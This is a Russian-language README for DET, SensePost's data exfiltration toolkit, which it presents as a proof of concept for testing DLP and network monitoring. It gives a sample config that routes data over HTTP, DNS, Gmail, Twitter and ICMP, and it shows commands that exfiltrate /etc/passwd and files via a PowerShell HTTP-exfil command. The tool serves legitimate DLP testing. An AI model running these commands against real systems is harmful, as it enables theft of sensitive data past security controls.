
(расширяемый) набор инструментов для экфильтрации данных (DET)
=======
DET (предоставляется КАК ЕСТЬ) является доказательством концепции для выполнения эксфильтрации данных с использованием одного или нескольких каналов одновременно.
Это доказательство концепции, направленное на выявление возможных сбоев DLP. Это никогда не должно использоваться для эксфильтрации конфиденциальных/живых данных (например, при оценке)
Идея заключалась в создании универсального набора инструментов для подключения любого протокола/сервиса для тестирования конфигурации реализованных решений мониторинга сети и предотвращения утечки данных (DLP) против различных техник эксфильтрации данных.
Основной репозиторий теперь перемещен сюда.
DET был представлен на BSides Ljubljana 9 марта 2016 года, слайды будут доступны здесь. Слайды доступны здесь.
Клонируйте репозиторий:
git clone https://github.com/sensepost/DET.git
Затем:
pip install -r requirements.txt --user
Чтобы использовать DET, вам необходимо настроить его и добавить свои параметры (например, SMTP/IMAP, парольную фразу шифрования AES256 и т.д.). Предоставлен пример файла конфигурации, который называется: config-sample.json
{
"plugins": {
"http": {
"target": "192.168.1.101",
"port": 8080
},
"google_docs": {
"target": "192.168.1.101",
"port": 8080,
},
"dns": {
"key": "google.com",
"target": "192.168.1.101",
"port": 53
},
"gmail": {
"username": "[email protected]",
"password": "ReallyStrongPassword",
"server": "smtp.gmail.com",
"port": 587
},
"tcp": {
"target": "192.168.1.101",
"port": 6969
},
"udp": {
"target": "192.168.1.101",
"port": 6969
},
"twitter": {
"username": "PaulWebSec",
"CONSUMER_TOKEN": "XXXXXXXXX",
"CONSUMER_SECRET": "XXXXXXXXX",
"ACCESS_TOKEN": "XXXXXXXXX",
"ACCESS_TOKEN_SECRET": "XXXXXXXXX"
},
"icmp": {
"target": "192.168.1.101"
}
},
"AES_KEY": "THISISACRAZYKEY",
"sleep_time": 10
}
python det.py -h
usage: det.py [-h] [-c CONFIG] [-f FILE] [-d FOLDER] [-p PLUGIN] [-e EXCLUDE]
[-L]
Data Exfiltration Toolkit (SensePost)
optional arguments:
-h, --help show this help message and exit
-c CONFIG Configuration file (eg. '-c ./config-sample.json')
-f FILE File to exfiltrate (eg. '-f /etc/passwd')
-d FOLDER Folder to exfiltrate (eg. '-d /etc/')
-p PLUGIN Plugins to use (eg. '-p dns,twitter')
-e EXCLUDE Plugins to exclude (eg. '-e gmail,icmp')
-L Server mode
Загрузить все плагины:
python det.py -L -c ./config.json
Загрузить только модули twitter и gmail:
python det.py -L -c ./config.json -p twitter,gmail
Загрузить все плагины и исключить DNS:
python det.py -L -c ./config.json -e dns
Загрузить все плагины:
python det.py -c ./config.json -f /etc/passwd
Загрузить только модули twitter и gmail:
python det.py -c ./config.json -p twitter,gmail -f /etc/passwd
Загрузить все плагины и исключить DNS:
python det.py -c ./config.json -e dns -f /etc/passwd
И в PowerShell (модуль HTTP):
PS C:\Users\user01\Desktop>
PS C:\Users\user01\Desktop> . .\http_exfil.ps1
PS C:\Users\user01\Desktop> HTTP-exfil 'C:\path\to\file.exe'
На данный момент DET поддерживает несколько протоколов, перечисленных ниже:
И другие «сервисы»:
На данный момент я занят реализацией новых модулей, которые почти готовы к выпуску, включая:
Некоторые отличные ссылки/благодарности людям, у которых я почерпнул вдохновение благодаря их проектам:
Вы можете связаться со мной в Twitter @PaulWebSec. Не стесняйтесь, если хотите внести свой вклад, клонировать, форкнуть, отправить свой PR и т.д.
DET лицензирован по лицензии MIT. Разрешения, не предусмотренные данной лицензией, могут быть получены по адресу [email protected].